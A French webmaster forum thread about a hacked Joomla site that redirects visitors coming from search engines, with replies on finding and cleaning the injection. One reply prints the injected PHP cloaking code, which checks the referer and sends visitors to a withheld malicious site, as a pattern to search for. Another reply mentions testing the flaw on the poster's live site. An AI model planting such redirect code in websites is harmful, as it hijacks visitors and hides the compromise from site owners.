Webmaster Hub: Site joomla piraté - Webmaster Hub

Aller au contenu

Règles du Forum

Merci de respecter les Règles du forum, et ne pas demander d'analyse de votre site.Les discussions portant sur ces sujets seront effacées sans préavis.
Si vous souhaitez des infos sur le code HTML, le CSS, Php ou MySql, les forums spécifiques sont là pour recueillir vos questions.
Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

Site joomla piraté Noter : -----

#1 L'utilisateur est hors-ligne   gm-crea 

  • Groupe : Membre
  • Messages : 1
  • Inscrit(e) : 09-janvier 12
  • Société:gm creation

Posté 09 janvier 2012 - 14:40

Bonjour,
Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.
Mon site est http://www.quermaurelle.com
Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.
Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.
Merci de vos réponses.
0

#2 L'utilisateur est en ligne   Nicolas 

  • ChatMaster
  • Voir le blog
  • Groupe : Fondateur
  • Messages : 4 262
  • Inscrit(e) : 19-août 03
  • Genre:Homme
  • Localisation:Peyrolles

Posté 09 janvier 2012 - 15:24

Bonjour,

Tu as eu une injection du code qui fait la redirection. Il faut que tu regardes dans tes templates, fichiers et repertoires qui sont accessibles en ecritures (777), base de données, ...
Le problème c'est que ce type de code est souvent crypté donc il est impossible de trouver une chaine de caractere (par exemple l'url destination).

Commence par le template... il y a p-e un code JS quelque part dans le template.
- C-VU : Présentez votre site
- REFTOWEB : Référencement de sites
- HEBTOWEB : Guide hébergement de site Internet
0

#3 L'utilisateur est hors-ligne   Cariboo 

  • Motoriste amateur
  • Groupe : Direction
  • Messages : 3 297
  • Inscrit(e) : 26-août 03
  • Genre:Homme
  • Localisation:London N7
  • Société:Twenga

Posté 09 janvier 2012 - 15:52

recherche un code dans tes scripts qui ressemble à ça :

error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: [l'adresse du site de destination que je ne mentionne pas exprès]"); exit(); } } } }

Il y'a un "cloaking", seuls les moteurs de recherche voient la redirection, c'est ce qui empêche la détection du problème !!
Philippe
Directeur SEO International chez Twenga
Pnambique : chatterbots et agents virtuels -
AB Traductions - Traducteurs - Interprètes - Traductions assermentées
0

#4 L'utilisateur est hors-ligne   yuston 

  • Voir le blog
  • Groupe : Membre+
  • Messages : 589
  • Inscrit(e) : 07-octobre 04
  • Genre:Homme
  • Localisation:Lausanne

Posté 09 janvier 2012 - 16:12

Et on peut regarder les dates des dernières modifications des fichiers. S'il y a un fichier modifié très récemment, il est probablement incriminé.
Andersen Lau - Me retrouver sur Twitter
Pour les jeunes qui n'ont pas encore réussi le permis de conduire, faites une petite accélération (prioritairement en voiture!) sur Le-Permis.ch. A fond les pédales!
0

#5 L'utilisateur est hors-ligne   Lutin Jaune 

  • Groupe : Actif
  • Messages : 30
  • Inscrit(e) : 24-juillet 06
  • Genre:Homme
  • Localisation:Lemainville
  • Société:en cours d'idée

Posté 27 janvier 2012 - 10:50

Bonjour,
je viens de me faire hacker le serveur
je pense que l'attaque venait par les sites joomla
Dan a remis mon serveur à plat, merci Dan, merci Arlette,
voici les infos trouvées suite à ma mésaventure.
je voudrais mettre en garde ceux à qui ca pourrait arriver

http://www.tux-plane...assword-change/
URGENT!! mettre à jour vos sites joomla en 2.5
je viens de tester sur le site le quermaurelle, la faille est présente, un formulaire apparait (je n'ai pas été plus loin)

autre info trouvée, concernant DirectAdmin,
voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
http://www.edelweiss...hp?topic=4380.0
;) à part pour les skins (suis pas féru des skins)

et pour "sécuriser" autant que faire se peut... un site Joomla
voici quelques conseils simples et concis à respecter
http://www.revue-heb...iser-joomla.php
http://www.support-j...ration/securite
et en dernier recours, y'a aussi ça:
http://www.shantee.n...vec-joomla.html
*edit
je réinstalle mes sites (mis à jour) petit à petit,
je m'inquiète de savoir si dans mes sources joomla
je n'ai pas embarqué une infection, certains sites étant des upgrades d'upgrade
et je conseille ce post: http://forum.ovh.com...ead.php?t=49433
qui traite des infections par iframe et
pour sécuriser encore plus un site joomla ou autre CMS d'ailleurs.



Voir le messagegm-crea, le 09 janvier 2012 - 14:40, dit :

Bonjour,
Mon site internet créé sur Joomla a été piraté mais je ne trouve pas ou est le code malveillant.
Mon site est http://www.quermaurelle.com
Lorsque l'on accède directement au site par l'url tout fonctionne bien, mais lorsque l'on passe par les moteurs de recherche il y a une redirection.
Est ce que quelqu'un pourrait m'aider ou me donner le nom d'une entreprise qui pourrait le faire.
Merci de vos réponses.

Ce message a été modifié par Lutin Jaune - 29 janvier 2012 - 05:56.

0

#6 L'utilisateur est hors-ligne   Dan 

  • Webmaster
  • Voir le blog
  • Voir la galerie
  • Groupe : Direction
  • Messages : 22 946
  • Inscrit(e) : 18-août 03
  • Genre:Homme
  • Localisation:St Anne, Alderney
  • Société:Webmaster Hub Ltd.

Posté 27 janvier 2012 - 15:45

Voir le messageLutin Jaune, le 27 janvier 2012 - 10:50, dit :

autre info trouvée, concernant DirectAdmin,
voici les erreurs (de débutant que j'ai faites) à ne pas commettre:
http://www.edelweiss...hp?topic=4380.0
;) à part pour les skins (suis pas féru des skins)

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)
Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.
La théorie, c'est quand on sait tout et que rien ne fonctionne. La pratique, c'est quand tout fonctionne et que personne ne sait pourquoi.
Si la pratique et la théorie sont réunies, rien ne fonctionne et on ne sait pas pourquoi. - Albert Einstein -
Infogérance de serveurs dédiés OVH
0

#7 L'utilisateur est hors-ligne   Lutin Jaune 

  • Groupe : Actif
  • Messages : 30
  • Inscrit(e) : 24-juillet 06
  • Genre:Homme
  • Localisation:Lemainville
  • Société:en cours d'idée

Posté 27 janvier 2012 - 19:30

je ne disais pas que l'histoire du skins était fausse,
je disais juste que j'avais pas commis cette erreur
puisque j'utilise toujours des skins garantis d'origine.
(3 erreurs sur 4 c'était déjà pas mal)
Merci Dan,

Voir le messageDan, le 27 janvier 2012 - 15:45, dit :

Leur conseil pour l'utilisation du skin "anglais" est correct, sauf si, comme dans le cas des serveurs que j'installe, une traduction française A JOUR est disponible (ou du moins a été développée et tenue à jour) ;)
Toutes les fonctionnalités sont donc accessibles, même avec le skin en langue française.

0

Partager ce sujet :


Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

1 utilisateur(s) en train de lire ce sujet
0 membre(s), 1 invité(s), 0 utilisateur(s) anonyme(s)